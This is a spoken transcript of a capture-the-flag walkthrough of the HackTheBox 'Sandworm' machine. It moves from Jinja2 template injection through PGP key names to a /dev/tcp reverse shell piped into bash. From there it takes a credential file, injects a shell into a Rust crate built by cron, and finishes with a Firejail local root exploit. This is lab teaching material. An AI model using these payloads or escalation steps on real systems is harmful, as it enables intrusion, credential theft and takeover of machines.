What's going on YouTube? This is Ipsec. I'm doing Sandworm from HackTheBox, which the website has a tip line. You can send messages over to the owners as long as this is PGP encrypted. Since not many people know how to do PGP encryption, it offers a getting started guide where you can test out decrypting, encrypting, and signing messages. When you sign a message, there's actually a SSTI vulnerability. It displays back who signed it, and there you can inject variables into it. You can dump the config, it doesn't really get you that much, but since it's Jinja 2, you can get code execution and land a shell on the server. You're in a Firejail, so you can't do that much. If you examine the configs, you get a password to another user, and then you discover there's a cron job that is running a cargo build periodically, so you can inject a dependency, get code execution as another user, and then there's a Firejail exploit at the end. So with all that being said, let's just jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Sandworm, then the IP address of 10.10.11.218. This can take some time to run, so I've already ran it. Looking at the results, we have 3 ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80, its banner tells us it's Nginx, also running on Ubuntu, and it's directing us over to the ssa.htb domain. So let's go ahead and add this to our host file. So sudo vi etc host, and then we can add 10.10.11.212 or 218, and then ssa.htb. And then the final port, we have Nginx listing on 443. This is HTTPS. It's also Ubuntu. We have information about the certificate and the title of the page. So let's just go take a look at the website. So I'm going to go to 10.10.11.218, and it'll direct us over to the ssa.htb. We could view the certificate if we wanted to and look at like common names to see if there's any other subdomains. So looking at here, I don't see anything else. We do have an email address of atlas@ssa.htb. So it looks like it is leaking potentially a username, unless Atlas is somewhere on the page and this is like the product, right? So doesn't look like it. So I'm guessing that is a user. We have the site powered by Flask. So we know this is Python. So if I did any like dir bustering or things like that, I wouldn't do things like add.php. We have a link here that says experience SSA. That's going to the about page. And this is just like a lot of text. So doesn't look too interesting. If we go over to contact, it's a way to submit tips, and they want all tips to be PGP encrypted. So if I just send anything here, it's going to say message is not PGP encrypted. If we don't know how to use PGP, we can check out their guide, which doesn't actually tell us how to really use it. I guess it points us to using like programs like KGPG, Cleopatra, OpenPGP. And then we have their signature here, and it has what key ID they are. And again, we have atlas at ssa.htb down here. So that is who owns this key. At the top of the page, it has their public key. So we can just copy this. And then I'm going to vssa.pub. We can add their public key here. And this will let us encrypt messages to them. So let's go back to the contact form. And whenever I see like contact forms, I like testing for cross-site scripting. So what I'm going to do is put a payload here that if it is vulnerable to cross-site scripting, it'll reach back out to my box. So I'm just going to call this message, and we'll do a image source is equal to HTTP 10.10.14.8 and then /a. Okay. So now we definitely want to listen on port 80. So if anyone connects back to us, we will know. So now the step is to encrypt this message. So I'm going to import their public key, directory key box. Is it -- import? There we go. It is -- import. So we can see their key ID, SSA. Does that match what the key ID was? Maybe this. Let's see. Guide. Yes, it does. So we have their key ID there. We could do gpg-list-keys, and we can see their key is indeed in our public key ring. So to encrypt a message, we're going to do a gpg, then --encrypt, and we can specify message. And we also want to do recipient, recipient, and it's going to be atlas@ssa.htb. And I'm also going to do -o space dash, and that's going to be output to standard out. And when I do that, we get a bunch of junk. So the best way to do this is what GPG or PGP calls armor. And it's essentially going to be just base64 with this little header, right? So now, if I paste this message in, let's see, the contact, it says, thank you for your submission. So we know it was a valid PGP thing because we didn't get that error message saying it could not be decrypted or whatever it said. So we just kind of wait for them to hit back on a web server. And while we're waiting, let's check out their guide to see what else is happening, right? So it looks like we can encrypt messages. So encrypt a message with, oh, their public key and paste it here. This is exactly what we did. So we can see it comes back here. This isn't vulnerable to cross-site scripting since our browser did not reach back to us. This one is provide our PGP key and they'll encrypt a message to us. So let's create a PGP key. To do that, I'm going to do a --full-generate key. Let's do RSA and RSA. Default key size. Let's have it valid forever to set it not to expire. Probably shouldn't do that. Our name, we'll say ipsec, root@ipsec.rocks. Comment, we'll call this test key. Do O for OK. And then let's assign a password to it. I'm just putting password there. It tells me it's bad. I'm going to say go ahead and use it. So now we have created a key. So if I do gpg-list keys, we can see my key is here as well. So let's do a gpg what are we doing? Sending them an encrypted message. Okay. So let's do --armor. Then I want to say we do, is it local user? Local user to sign or decrypt. So sign is that. Let's see. Oh, all we need to do is provide a key. We're not encrypting a message. So let's do --list keys. And we can say gpg-export. We'll give it this key. And we need to specify armor. And then I'll do xclip the selection to clipboard. So that just copied this to my clipboard. So now I can paste this here. And they gave us a encrypted message with our public key. So we want to decrypt this. So I'm going to do vi encrypted.pgp. We'll paste this in. And then we can do gpg, what is it? Probably decrypt. Yep. And then the file, let's do encrypted.pgp. And I'm going to specify -o-. So output goes to standard out. We'll put our password in. And we see the message. So let's now go try the next thing, which is going to be verify a signature. So we have to sign a message to them. So let's just sign our message, right? We just have this. So let's sign the message. We'll do gpg-clear sign. And I'm going to do -h. We want local user. We can just do -u. and then the key, gpg-list keys, specify this. I probably could have said IPsec or something. So we have that, and then we can specify the file. And a file we want to encrypt or assign was just message. And if we look, we have a message.asc file, and that is going to be our assigned message. We could also, if we wanted to, just do a -o dash, and that'll put straight to standard out. Then we could say xclip selection clipboard if we didn't want to highlight it. So if we paste this here, then we need to get our public key that we signed it with. So let's go back to our export. And we do verify signature. We can see it's saying the message is signed valid. We see IPsec right there, and then test key. If we put something bad here, let's just try this. Wonder what's going to happen. It's not valid base 64. So actually, let me try one thing. We can put that there. Okay. And then what is theirs? Xclip selection clipboard. I'm just going to try putting their key here and then sign. And I'm guessing if the signature is not valid, it just says it's not properly formatted. I was hoping to get like some type of error, but doesn't look like we do. So the next thing I want to test for is checking if we got any hits on cross-site scripting. We didn't, so I'm guessing it's not vulnerable to cross-site scripting, but it is outputting information from our key here. And we know the website is Jinja, so if this is like using a Jinja 2 template to get all this output, maybe there's a server-side template injection, right? So let's test for that. To do that, we can do a GPG full generate key to make a new key. All the defaults, sure, yep. And then a name, I'm just going to put a SSTI payload that I know off the top of my head. And all that's going to do, if it's vulnerable from SSTI, is dump the config of the server. And that's going to be like the environment variables. So we can save that. We'll do a super secret password of password again. Say, yep, that is what we want. And we have the key 6E29. So let's go back to the clear sign. And we're going to sign it with that key. And we can export that key. And then when we verify the signature, we see where the username was. It's now dumping the config. And right off the bat, we have MySQL creds right here. So SQL Alchemy database URL, MySQL, Atlas, garlic and onion Z42. So let's try SSH atlas at ssa.htb. Paste in the password. It doesn't work. Make sure we copied it right. We did. So I'm just going to take note of it. So I can say MySQL, Atlas, garlic and onion, whatever. The secret key, so we could sign cookies if we wanted to. It looks like it dumped it twice, actually. Not sure exactly why, but we don't really have anything else that's important here. So let's try a different payload. I'm going to go to HackTricks, and then we can say SSTI Jinja 2. And let's find a payload that will get us RCE. So Jinja 2 SSTI. It's going to load. I guess while that loads, we can create what we want. So we'll do payload --I dev TCP 10.10.14.8 9001 0 and 1. So Jinja 2. And we're looking for one with RCE. Just going to search for popen. I think this will probably work. I think that's bypassing a sandbox. I'm just going to go to the top, type popen. Okay, let's just try this. So let's go SSTI. Let's see. So it's just doing a popen ls here, and we want to get our reverse shell there. So I'm going to cat payload. And we'll do a base64-w0. And we can just copy this. And where ls is, we can say echo. What do we do, -n or not? Does it matter? Doesn't look like it matters. So we can just do echo that base64, base64-d, and then pipe it over to bash. Okay. Let's cat SSTI. We can grab this. I'm just going to glance at my payload once more. That does look good. So we create a new GPG key. Yep. All the defaults. We'll do that for the name. Okay. A super secret password. Copy our key. We can export the key. Let's go back here. Paste that in. Then we have to sign. So we can copy this, paste it in, verify signature, and it's hung. And we did have we don't have a listener on 9001. Let's start one up and click verify signature. Wonder if I have to refresh the page. Let's try this again. NC LVNP 9001. That is the signature. That is the export. It's definitely hung, but we're not getting a shell. Let's do cat SSTI. We can just copy and paste this for good measure. So the reverse shell works, but our payload does not. Let's see, is there any other popen? There we go. I think this is the one I want. I was confused because the other payload did not start with a double slash, and that's not what I was used to saying. Maybe I wasn't on Jinja 2 there. No, this whole page is Jinja 2. I don't know. But let's try this one. Let's go down here. Highlight output. Clean this up. Okay, so now we have to create a new key. This is annoying. Yep. Real name. Copy this payload. Okay. Put a password. Then we have this key. Oh. I was signing the message. Yeah, that's fine. It doesn't matter what I signed. Never mind. I was thinking I needed to sign the SSTI payload, but the actual SSTI is inner script, right? Or inner signature. So we got that. Let's go to export. And I'm hitting Alt-D, and it just deletes the word. So it deleted everything at once, so I didn't have to hold delete. NC LVNP 9001. Verify signature. And there we go. We got a shell. So I'm not sure why the other payload didn't work, but oh well. With the shell, I guess we can get a proper PTY. I don't know exactly what this is doing. We got an error message, but import PTY, PTY spawn, bin bash, then STTY raw minus echo FG, enter, enter. And then we can also export term is equal to X term so we can clear the screen. So let's see. If we do SSLNTP, not found. Netstat ANTP, not found. So we don't have anything to look at open ports. I want to try to connect to MySQL. We don't have like any MySQL client. So that's odd. Here is the source code to the application. Doesn't really buy us much because we already dumped the config that had the credentials. So if I went to /proc, we can go like look at one. If I cat cmd line, it tells us we're in a jail. So this is the output of the very first PID. I was thinking we're in a jail because just we don't have a lot of commands. I've never really not been able to netstat or what is it? SS. There's probably like a net, and then we could potentially get open ports from here. Cat TCP. Yeah, this would be able to get us open ports, but I don't exactly remember how this is filtered. And of course, we don't have less-s. So I think this would be 127.0.0.1 on hex port of 1388. Can we easily see that? Does Python 3, we do, no. That's not what I want to do. I want to unhex it. Is there unhex? Nope. What if we just do hex like that? There we go, 5,000. So that shows it is listening on 5,000. So we could try this one. This is probably going to be 3306. It is. So this is definitely listening on MySQL. I guess we could try uploading Chisel to see if we can just talk to the SQL database. I did not actually do that when solving this box, but I don't know if we can within the jail. So let's try it out. So I'm going to copy Chisel here. And then we can stand up a web server. Then we can wget 10.10.14.8, 8,000, Chisel. We don't have wget. We don't have curl. Don't have touch. And it's read-only file system. So that's not actually going to help us really. Because we won't be able to get Chisel on the box. I wonder if dev SHM. Can we even write here? We could. So I guess we could potentially get chisel on the box. Let's see. NC LVNP 9001. Let's pipe chisel to it. And then, can I remember how to do this? Well, cat dev TCP 10.10.14.8 9001 out to chisel. I'm going to give it a second to finish that copy. Of course, we probably don't have MD5 sum, so we can't identify if it worked, but looks like it's there. Let's make it executable. We don't have chmod. That is annoying. So we can't do /chisel, right? Yeah. I'm not exactly sure how to make that executable to get this working. Do we have umask? We do. I wonder if umask 000, if that actually works. We don't have touch. And no, that does not make it executable. Do we have copy? Because we could just copy like bin bash here and then move files to it. Nope, we don't. So I'm not sure how to get this executable. I guess if we really wanted to, we could probably like find a Python proxy and run that. But let's see what else is on the box. So if we go to our home directory, there is a cargo directory. There's also a .config. If we go in .config, we have Firejail and HTTP Py, or I think that's HTTP Py. I don't know how to pronounce that. Let's go in sessions, localhost. There is an admin.json file. See what exactly this is. But we do have another credential, silent observer, quiet like the wind. So let us look at this. Something to help with APIs. No idea. So let us just SSH to the box. Let's try SSH silent observer at ssa.htb. Paste in this password. And we get logged in. So now let's do a cat on creds and see if we can SU to Atlas. Because maybe like Atlas is prohibited from logging in via SSH, and that's why it was blocked. But it looks like that still doesn't work. But we can do MySQL. So let's do atlas-p, paste in the password, show databases, use SSA, show tables, select star from users, and we have some SHA-256 hashes, one for Odin. I'm guessing that's not going to crack fast. Let's see, do I have the Kraken up? I do. So let's go over to hashcat v hashes / SSA, I'll call this. Put in that password, /hashcat, opt word list rocku. And it does not match. Let's see. Hashcat example hashes. Okay. Let's grab this and search. And I don't think it's going to be TrueCrypt. Probably not Cisco. Could be Django, but I don't think so because this is Flask. It's probably going to be this format. So let's copy what this looks like. Then we can v hashes SSA, paste this in, and go through the format. So it doesn't want that header. Then this is the iteration count. And that doesn't use $signs as separators. It uses colons. And I'm guessing if we pasted, let's see, v hashes SSA, or that won't even bother. I was betting John would just natively decrypt this. It's probably like a John format, not hashcat. But we've already modified it. So let's do hashcat.bin, hashes SSA, opt word list, rocku.text. And let's see if it starts cracking. Looks like it is. And it's going to take potentially 15 minutes. So while that goes, I'm going to go back to my terminal and let's see what else is there. If we go up one directory, we can go in Atlas, and it looks like we can view his home directory. So let's see. The config, if we do find.config, that is the Firejail stuff that we saw before and HTTP. There is a cargo directory. It was in our directory as well. Do ls on cargo. Go in registry. There is this cachedir.tag. And if I look at the date on the system, it's the same day. I believe it's weird that this is in military time, this is PM. This is just 2 minutes ago. So something is happening with cargo on this box. So if I do a LSLA again, we can see 2350. If I do stat on this, we can see it was changed and modified. Access date is June 6th, but we keep modifying this. So it looks like cargo is being ran on this system. So I'm going to run pspy. Let's see, do we have pspy on our box? Let's see, ls opt. Or we can do find opt grep pspy. I don't think I do. So let's do GitHub pspy and download it. We could also like run linps and change it so it's in not in fast mode. But I'm just going to do pspy on this one. wget python 3-m http server. Let's do wget 10.10.14.8 8000 pspy. Was it 64? There we go. Let's make it executable. And then we can run it. And it looked like it was running every 2 minutes. So let's see, the date. Oh shoot, I probably just missed it. Let's see, we see Firejail. That is my reverse shell. And let's see, there is a cleanup script. It's making this tipnet set UID, which is odd. We should take a look at this binary. Let's see. SH Atlas at 10.10.11 218. I think the IP was. Silent observer. Oh, silent observer. Copy the right password. And we can see pspy went off, but that is just because I logged in through SSH. If I run date, we have about probably a minute left until we think the cargo is going to go off. What was it? CD opt tipnet. Where is it? Target debug tipnet. This is set UID. So I'm not exactly sure what that is. And looking at this, see, we had the cleanup, we have cargo running. And let's see. It's going to go into this directory, switch over to the Atlas user, and run cargo. So cargo is Rust like package manager. So it's kind of like the pip equivalent of Rust. If we go in up tipnet, we can look at the cargo toml. Let's see. And this is going to be all the things it installs. Let's go up one directory, go to crates and logger. Actually, can we find anything writable here? Let's hide all error messages. And we can't write to any files here. We can write to files in crates logger. So if we modify this source code and have this function probably send us a shell, whenever it does a log, it'll also send us a shell. And if it's set UID, maybe we'll get lucky and it'll send us a root shell, or maybe just a shell as that Atlas user. Let's see. What was that permission of tipnet? Find dot dash name tipnet. Target. There we go. So it is set UID, but only running owned by Atlas. So it won't let us switch over to root. It would have to be owned by root there. But we can get on the Atlas user this way. So let's go into logger, source, and let's see. Rust run command. So we're going to use this library and then do command new. So v, oh, there must be a cron clearing that file or reverting that file. So what I'm going to do is cp librs to dev shm. We will edit it here and then copy it to that directory. So we can add that command and then add this. Let's set paste. There we go. So it's executing sh-c. And we can say echo. Let's see, we have the SSTI payload still. We do. Let's just copy this. Paste. And then it looks like we need to put a semicolon here. We copied a little bit too much. It's probably because what we copied was in like an if-then statement. This is checking if it's Windows or Linux, and we copied that. We definitely don't want that. So that looks good. So let's copy librs to opt crates logger source. And then we want to make sure we listen on 9001 because that's where a shell is going to go. And it looks like it'll probably happen in about 90 seconds. So let's do a sleep 70 and I will resume when that's done. Our hashcat has finished. It didn't crack anything. So now we're just waiting for the sleep to finish. The sleep has finished. If I do a date, we have about 10 seconds left until we hopefully get our shell. So in 5 seconds, the cargo should start building. We can probably do a ps-ef grep cargo now. And we see cargo was running and we got a shell. So now we are finally the Atlas user. So let's do Python 3-c import pty spawn bin bash. And then sty rom minus echo fg. And then export term is equal to xterm so we can clear the screen. So now that with the Atlas user, we want to see exactly what this gets us. So the quickest way is just do like a find / user atlas and then hide error messages. Let's see. We own var dub. This is probably going to be all the PGP messages that we sent. So I guess it may be possible if we looked at all the messages that we can decrypt someone else's message with GPG, and my terminal screwed up. When I hit home, my cursor is just moving out. It'll be easiest if we just do SSH, and then let's just create a key. Cat atlas.pub, and we can move this over to authorized keys. sh-i atlas at 10 10 11. I think it's 218, but we can just use sa.htb. And there we go. So where was that message? Var dub HTML SSA submissions. There we go. So let's do a GPG -d to decrypt this message. It's encrypted with key ID C6D. GPG -list keys. We do not have that key, I don't think. We do not. grep-r GPG. Let's see, it's using the keys in GNU-PG, so that's the key ring we have. This is the password for it, so that's probably something we should save. V creds.txt GPG PW. There we go. Let's go back to submissions. There is a log. And these are old. I wonder if this is from when people were testing the box. Or maybe it's put by the creator. Yeah, these are all old files. Maybe we can decrypt the other one. Nope. So these look like they're encrypted with other people's keys. We can view the ones that are in ASCII. Selling iOS O'Day. Let's see, what is this one? This is our attempt at XSS. Then this. Some weird message. So this isn't anything. We could just try a SU with this password. Not that easy. Do we have any pseudo rules? We need Atlas's password, which we still don't have. Let's see. We are a member of the jailer group. I don't know what that is. So let's do a find / group jailer to dev null. And jailer can execute Firejail. Let's see. That is a set UID binary, I believe. So let's see. It is Firejail 0968. Is there any vulnerabilities here? Grab this. Local root. I am pretty sure we've done this one before. See, is this the exploit? Ah, here we go. Firejoin.py. So let's go here. CP downloads firejoin py.bit. What? That is a Python script. I don't know why it gave it the .bin extension. Maybe it's just a quirk of that mailing list. It's weird. Let's see. That's not SSH. Here we go. So dev shm. Let's wget 10 10 14 8 8000 firejail.py. It's not what I called it. Fire join. Python 3 firejoin.py. We need executable bit, and it says we can run firejail-join in another terminal. So let's SSH again. 10 10 11 218. And when we run this exploit, let's see, what's it say? Mung. Contain 1. Oh, it says we can SU. Yep, we can. So there we go. And if we look at root.txt, we can get it. So that is the box. Hope you guys enjoyed it. Take care, and I will see you all next time.